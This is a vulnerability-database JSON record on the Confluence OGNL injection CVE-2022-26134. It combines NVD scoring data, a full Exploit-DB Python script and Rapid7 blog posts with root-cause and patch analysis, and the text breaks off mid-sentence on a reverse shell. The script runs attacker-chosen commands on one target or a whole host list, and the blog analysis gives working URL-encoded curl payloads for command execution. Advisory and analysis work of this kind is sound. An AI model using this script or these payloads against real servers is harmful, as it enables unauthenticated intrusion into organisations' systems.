"2022-06-03T22:15:00", "type": "cve", "title": "CVE-2022-26134", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T06:15:00", "cpe": ["cpe:/a:atlassian:confluence_data_center:7.18.0", "cpe:/a:atlassian:confluence_server:7.18.0"], "id": "CVE-2022-26134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26134", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:confluence_data_center:7.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:confluence_server:7.18.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-03T11:59:46", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T00:00:00", "type": "exploitdb", "title": "Confluence Data Center 7.18.0 - Remote Code Execution (RCE)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-26134", "CVE-2022-26134"], "modified": "2022-06-10T00:00:00", "id": "EDB-ID:50952", "href": "https://www.exploit-db.com/exploits/50952", "sourceData": "# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)\r\n# Google Dork: N/A\r\n# Date: 06/006/2022\r\n# Exploit Author: h3v0x\r\n# Vendor Homepage: https://www.atlassian.com/\r\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\r\n# Version: All < 7.4.17 versions before 7.18.1\r\n# Tested on: -\r\n# CVE : CVE-2022-26134\r\n# https://github.com/h3v0x/CVE-2022-26134\r\n\r\n#!/usr/bin/python3\r\n\r\nimport sys\r\nimport requests\r\nimport optparse\r\nimport multiprocessing\r\n\r\nfrom requests.packages import urllib3\r\nfrom requests.exceptions import MissingSchema, InvalidURL\r\nurllib3.disable_warnings()\r\n\r\nrequestEngine = multiprocessing.Manager()\r\nsession = requests.Session()\r\n\r\nglobal paramResults\r\nparamResults = requestEngine.list()\r\nglobals().update(locals())\r\n\r\ndef spiderXpl(url):\r\n globals().update(locals())\r\n if not url.startswith('http'):\r\n url='http://'+url\r\n \r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\r\n \"Connection\": \"close\",\r\n \"Accept-Encoding\": \"gzip, deflate\"}\r\n\r\n try:\r\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\r\n if(response.status_code == 302):\r\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\r\n\r\n inputBuffer = str(response.headers['X-Cmd-Response'])\r\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\r\n else:\r\n pass\r\n\r\n except requests.exceptions.ConnectionError:\r\n print('[x] Failed to Connect: '+url)\r\n pass\r\n except multiprocessing.log_to_stderr:\r\n pass\r\n except KeyboardInterrupt:\r\n print('[!] Stoping exploit...')\r\n exit(0)\r\n except (MissingSchema, InvalidURL):\r\n pass\r\n \r\n \r\ndef banner():\r\n print('[-] CVE-2022-26134')\r\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\r\n\r\n \r\ndef main():\r\n banner()\r\n \r\n globals().update(locals())\r\n \r\n sys.setrecursionlimit(100000)\r\n\r\n if not optionsOpt.filehosts:\r\n url = optionsOpt.url\r\n spiderXpl(url)\r\n else:\r\n f = open(optionsOpt.filehosts)\r\n urls = map(str.strip, f.readlines())\r\n\r\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\r\n try:\r\n multiReq.map(spiderXpl, urls)\r\n multiReq.close()\r\n multiReq.join()\r\n except UnboundLocalError:\r\n pass\r\n except KeyboardInterrupt:\r\n exit(0)\r\n\r\n\r\n if optionsOpt.output:\r\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\r\n\r\n with open(optionsOpt.output, \"w\") as f:\r\n for result in paramResults:\r\n f.write(\"%s\\n\" % result)\r\n f.close()\r\n\r\nif __name__ == \"__main__\":\r\n parser = optparse.OptionParser()\r\n\r\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\r\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\r\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\r\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\r\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\r\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\r\n optionsOpt, args = parser.parse_args()\r\n\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50952", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2022-06-14T17:04:53", "description": "## A Confluence of High-Profile Modules\n\n\n\nThis release features modules covering the Confluence remote code execution bug CVE-2022-26134 and the hotly-debated CVE-2022-30190, a file format vulnerability in the Windows Operating System accessible through malicious documents. Both have been all over the news, and we\u2019re very happy to bring them to you so that you can verify mitigations and patches in your infrastructure. If you\u2019d like to read more about these vulnerabilities, Rapid7 has AttackerKB analyses and blogs covering both Confluence CVE-2022-26134 ([AttackerKB](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>))and Windows CVE-2022-30190 ([AttackKB](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>), [Rapid7 Blog](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>)).\n\n## Metasploit 6.2\n\nWhile we release new content weekly (or in real-time if you are using github), we track milestones as well. This week, we released Metasploit 6.2, and it has a whole host of [new functionality, exploits, and fixes](<https://www.rapid7.com/blog/post/2022/06/09/announcing-metasploit-6-2/>)\n\n## New module content (2)\n\n * [Atlassian Confluence Namespace OGNL Injection](<https://github.com/rapid7/metasploit-framework/pull/16644>) by Spencer McIntyre, Unknown, bturner-r7, and jbaines-r7, which exploits [CVE-2022-26134](<https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134>) \\- This module exploits an OGNL injection in Atlassian Confluence servers (CVE-2022-26134). A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.\n * [Microsoft Office Word MSDTJS](<https://github.com/rapid7/metasploit-framework/pull/16635>) by mekhalleh (RAMELLA S\u00e9bastien) and nao sec, which exploits [CVE-2022-30190](<https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190?referrer=blog>) \\- This PR adds a module supporting CVE-2022-30190 (AKA Follina), a Windows file format vulnerability.\n\n## Enhancements and features (2)\n\n * [#16651](<https://github.com/rapid7/metasploit-framework/pull/16651>) from [red0xff](<https://github.com/red0xff>) \\- The `test_vulnerable` methods in the various SQL injection libraries have been updated so that they will now use the specified encoder if one is specified, ensuring that characters are appropriately encoded as needed.\n * [#16661](<https://github.com/rapid7/metasploit-framework/pull/16661>) from [dismantl](<https://github.com/dismantl>) \\- The impersonate_ssl module has been enhanced to allow it to add Subject Alternative Names (SAN) fields to the generated SSL certificate.\n\n## Bugs fixed (4)\n\n * [#16615](<https://github.com/rapid7/metasploit-framework/pull/16615>) from [NikitaKovaljov](<https://github.com/NikitaKovaljov>) \\- A bug has been fixed in the IPv6 library when creating solicited-multicast addresses by finding leading zeros in last 16 bits of link-local address and removing them.\n * [#16630](<https://github.com/rapid7/metasploit-framework/pull/16630>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The `auxiliary/server/capture/smb` module no longer stores duplicate Net-NTLM hashes in the database.\n * [#16643](<https://github.com/rapid7/metasploit-framework/pull/16643>) from [ojasookert](<https://github.com/ojasookert>) \\- The `exploits/multi/http/php_fpm_rce` module has been updated to be compatible with Ruby 3.0 changes.\n * [#16653](<https://github.com/rapid7/metasploit-framework/pull/16653>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- : \nThis PR fixes an issue where named pipe pivots failed to establish the named pipes in intermediate connections.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-06-02T11%3A20%3A37-04%3A00..2022-06-09T09%3A41%3A47-05%3A00%22>)\n * [Full diff 6.2.1...6.2.2](<https://github.com/rapid7/metasploit-framework/compare/6.2.1...6.2.2>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T18:07:05", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-30190"], "modified": "2022-06-10T18:07:05", "id": "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "href": "https://blog.rapid7.com/2022/06/10/metasploit-weekly-wrap-up-161/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-29T21:59:42", "description": "\n\nExploitation is underway for one of the [trio of critical Atlassian vulnerabilities](<https://confluence.atlassian.com/security/july-2022-atlassian-security-advisories-overview-1142446703.html>) that were published last week affecting several the company\u2019s on-premises products. Atlassian has been a focus for attackers, as it was less than two months ago that we observed exploitation of [CVE-2022-26134 in Confluence Server and Confluence Data Center](<https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/>).\n\n**CVE-2022-26138: Hardcoded password in Questions for Confluence app impacting:**\n\n * Confluence Server\n * Confluence Data Center\n\n**CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities impacting:**\n\n * Bamboo Server and Data Center\n * Bitbucket Server and Data Center\n * Confluence Server and Data Center\n * Crowd Server and Data Center\n * Crucible\n * Fisheye\n * Jira Server and Data Center\n * Jira Service Management Server and Data Center\n\n## CVE-2022-26138: Hardcoded password in Questions for Confluence app\n\nThe most critical of these three is [CVE-2022-26138](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), as it was quickly exploited in the wild once the hardcoded password was released on social media. There is a limiting function here, however, as this vulnerability only exists when the Questions for Confluence app is enabled (and does not impact the Confluence Cloud instance). Once the app is enabled on affected versions, it will create a user account with a hardcoded password and add the account to a user group, which allows access to all non-restricted pages in Confluence. This easily allows a remote, unauthenticated attacker to browse an organization\u2019s Confluence instance. Unsurprisingly, it didn\u2019t take long for Rapid7 to observe exploitation once the hardcoded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks.\n\n## Affected versions\n\n * Questions for Confluence 2.7.x\n\n * 2.7.34\n * 2.7.35\n * Questions for Confluence\n\n * 3.0.x\n * 3.0.2\n\n## Mitigation guidance\n\nOrganizations using on-prem Confluence should follow Atlassian\u2019s guidance on updating their instance or disabling/deleting the account. Rapid7 recommends organizations impacted by this take steps immediately to mitigate the vulnerability. Atlassian\u2019s advisory also includes information on how to look for evidence of exploitation. An [FAQ](<https://confluence.atlassian.com/kb/faq-for-cve-2022-26138-1141988423.html>) has also been provided.\n\n> Please note: Atlassian\u2019s [Questions For Confluence Security Advisory 2022-07-20](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>) has a very important call-out that \u201cuninstalling the Questions for Confluence app does not remediate this vulnerability.\u201d\n\n## CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities\n\nTwo other vulnerabilities were announced at the same time, [CVE-2022-26136 and CVE-2022-26137](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>), which are also rated critical by Atlassian. They both are issues with Servlet Filters in Java and can be exploited by remote, unauthenticated attackers. Cloud versions of Atlassian have already been fixed by the company.\n\nThe list of affected versions is long and can be found on [Atlassian\u2019s Security Advisory](<https://confluence.atlassian.com/security/multiple-products-security-advisory-cve-2022-26136-cve-2022-26137-1141493031.html>).\n\nWhile the impact of these vulnerabilities will vary by organization, as mentioned above, attackers place a high value on many Atlassian products. Therefore, Rapid7 recommends that organizations update impacted product versions as there is no mitigation workaround available.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-26138 with a remote vulnerability check released on July 29, 2022 (ContentOnly-content-1.1.2602-202207292027).\n\n## Updates\n\n07/29/2022 - 5:30 PM EDT \nUpdated Rapid7 customers section to include information on a new remote vulnerability check.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T19:26:38", "type": "rapid7blog", "title": "Active Exploitation of Atlassian\u2019s Questions for Confluence App CVE-2022-26138", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134", "CVE-2022-26136", "CVE-2022-26137", "CVE-2022-26138"], "modified": "2022-07-27T19:26:38", "id": "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D", "href": "https://blog.rapid7.com/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T01:56:25", "description": "\n\nOn June 2, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for CVE-2022-26134, a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center. The vulnerability was unpatched when it was published on June 2. As of June 3, both patches and a temporary workaround are available.\n\nCVE-2022-26134 is being actively and widely [exploited in the wild](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>). Rapid7's Managed Detection and Response (MDR) team has observed an uptick of likely exploitation of CVE-2022-26134 in customer environments as of June 3.\n\nAll supported versions of Confluence Server and Data Center are affected. \nAtlassian updated their advisory on June 3 to reflect that it's likely that **all versions** (whether supported or not) of Confluence Server and Data Center are affected, but they have yet to confirm the earliest affected version. Organizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately.\n\n## Technical analysis\n\nCVE-2022-26314 is an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server (typically the `confluence` user on Linux installations). Given the nature of the vulnerability, [internet-facing](<https://www.shodan.io/search?query=X-Confluence-Request-Time>) Confluence servers are at very high risk.\n\nLast year, Atlassian Confluence suffered from a different unauthenticated and remote OGNL injection, [CVE-2021-26084](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>). Organizations maintaining an internet-facing Confluence or Data Server may want to consider permanently moving access behind a VPN.\n\n### The vulnerability\n\nAs stated, the vulnerability is an OGNL injection vulnerability affecting the HTTP server. The OGNL payload is placed in the URI of an HTTP request. Any type of HTTP method appears to work, whether valid (GET, POST, PUT, etc) or invalid (e.g. \u201cBALH\u201d). In its simplest form, an exploit abusing the vulnerability looks like this:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/\n \n\nAbove, the exploit is URL-encoded. The exploit encompasses everything from the start of the content location to the last instance of `/`. Decoded it looks like this:\n \n \n ${@java.lang.Runtime@getRuntime().exec(\"touch /tmp/r7\")}\n \n\nEvidence of exploitation can typically be found in access logs because the exploit is stored in the HTTP request field. For example, on our test Confluence (version 7.13.6 LTS), the log file `/opt/atlassian/confluence/logs/conf_access_log.<yyyy-mm-dd>.log` contains the following entry after exploitation:\n \n \n [02/Jun/2022:16:02:13 -0700] - http-nio-8090-exec-10 10.0.0.28 GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ HTTP/1.1 302 20ms - - curl/7.68.0\n \n\nScanning for vulnerable servers is easy because exploitation allows attackers to force the server to send command output in the HTTP response. For example, the following request will return the response of `whoami` in the attacker-created `X-Cmd-Response` HTTP field (credit to Rapid7\u2019s Brandon Turner for the exploit below). Note the `X-Cmd-Response: confluence` line in the HTTP response:\n \n \n curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/\n * Trying 10.0.0.28:8090...\n * TCP_NODELAY set\n * Connected to 10.0.0.28 (10.0.0.28) port 8090 (#0)\n > GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n > Host: 10.0.0.28:8090\n > User-Agent: curl/7.68.0\n > Accept: */*\n > \n * Mark bundle as not supporting multiuse\n < HTTP/1.1 302 \n < Cache-Control: no-store\n < Expires: Thu, 01 Jan 1970 00:00:00 GMT\n < X-Confluence-Request-Time: 1654212503090\n < Set-Cookie: JSESSIONID=34154443DC363351DD0FE3D1EC3BEE01; Path=/; HttpOnly\n < X-XSS-Protection: 1; mode=block\n < X-Content-Type-Options: nosniff\n < X-Frame-Options: SAMEORIGIN\n < Content-Security-Policy: frame-ancestors 'self'\n < X-Cmd-Response: confluence \n < Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n < Content-Type: text/html;charset=UTF-8\n < Content-Length: 0\n < Date: Thu, 02 Jun 2022 23:28:23 GMT\n < \n * Connection #0 to host 10.0.0.28 left intact\n \n\nDecoding the exploit in the `curl` request shows how this is achieved. The exploit saves the output of the `exec` call and uses `setHeader` to include the result in the server\u2019s response to the attacker.\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"whoami\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}\n \n\n### Root cause\n\nOur investigation led to the following partial call stack. The call stack demonstrates the OGNL injection starting from `HttpServlet.service` to `OgnlValueStack.findValue` and beyond.\n \n \n at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)\n at ognl.SimpleNode.getValue(SimpleNode.java:193)\n at ognl.Ognl.getValue(Ognl.java:333)\n at ognl.Ognl.getValue(Ognl.java:310)A\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n \n\n`OgnlValueStack` [findValue(str)](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) is important as it is the starting point for the OGNL expression to be evaluated. As we can see in the call stack above, `TextParseUtil.class` invokes `OgnlValueStack.findValue` when this vulnerability is exploited.\n \n \n public class TextParseUtil {\n public static String translateVariables(String expression, OgnlValueStack stack) {\n StringBuilder sb = new StringBuilder();\n Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n String str1, g = m.group(1);\n int start = m.start();\n try {\n Object o = stack.findValue(g);\n str1 = (o == null) ? \"\" : o.toString();\n } catch (Exception ignored) {\n str1 = \"\";\n } \n sb.append(expression.substring(previous, start)).append(str1);\n previous = m.end();\n } \n if (previous < expression.length())\n sb.append(expression.substring(previous)); \n return sb.toString();\n }\n }\n \n\n`ActionChainResult.class` calls `TextParseUtil.translateVariables` using `this.namespace` as the provided expression:\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\nWhere `namespace` is created from the request URI string in `com.opensymphony.webwork.dispatcher.ServletDispatcher.getNamespaceFromServletPath`:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nThe result is that the attacker-provided URI will be translated into a namespace, which will then find its way down to OGNL expression evaluation. At a high level, this is very similar to [CVE-2018-11776](<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_namespace_ognl.rb>), the Apache Struts2 namespace OGNL injection vulnerability. Just a reminder that there is nothing new in this world.\n\n### The patch\n\nOn June 3, 2022, Atlassian directed customers to replace `xwork-1.0.3.6.jar` with a newly released `xwork-1.0.3-atlassian-10.jar`. The xwork jars contain the `ActionChainResult.class` and `TextParseUtil.class` we identified as the path to OGNL expression evaluation.\n\nThe patch makes a number of small changes to fix this issue. For one, `namespace` is no longer passed down to `TextParseUtil.translateVariables` from `ActionChainResult.execute`:\n\n**Before:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\n**After:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n String finalNamespace = this.namespace;\n String finalActionName = this.actionName;\n \n\nAtlassian also added `SafeExpressionUtil.class` to the `xworks` jar. `SafeExpressionUtil.class` provides filtering of unsafe expressions and has been inserted into `OgnlValueStack.class` in order to examine expressions when `findValue` is invoked. For example:\n \n \n public Object findValue(String expr) {\n try {\n if (expr == null)\n return null; \n if (!this.safeExpressionUtil.isSafeExpression(expr))\n return null; \n if (this.overrides != null && this.overrides.containsKey(expr))\n \n\n### Payloads\n\nThe OGNL injection primitive gives attackers many options. Volexity\u2019s excellent **[Zero-Day Exploitation of Atlassian Confluence](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)** discusses JSP webshells being dropped to disk. However, Confluence Server should typically execute as `confluence` and not `root`. The `confluence` user is fairly restricted and unable to introduce web shells (to our knowledge).\n\nJava does otherwise provide a wide variety of features that aid in achieving and maintaining execution (both with and without touching disk). It\u2019s impossible to demonstrate all here, but a reverse shell routed through Java\u2019s [Nashorn](<https://docs.oracle.com/javase/10/nashorn/introduction.htm#JSNUG136>) engine 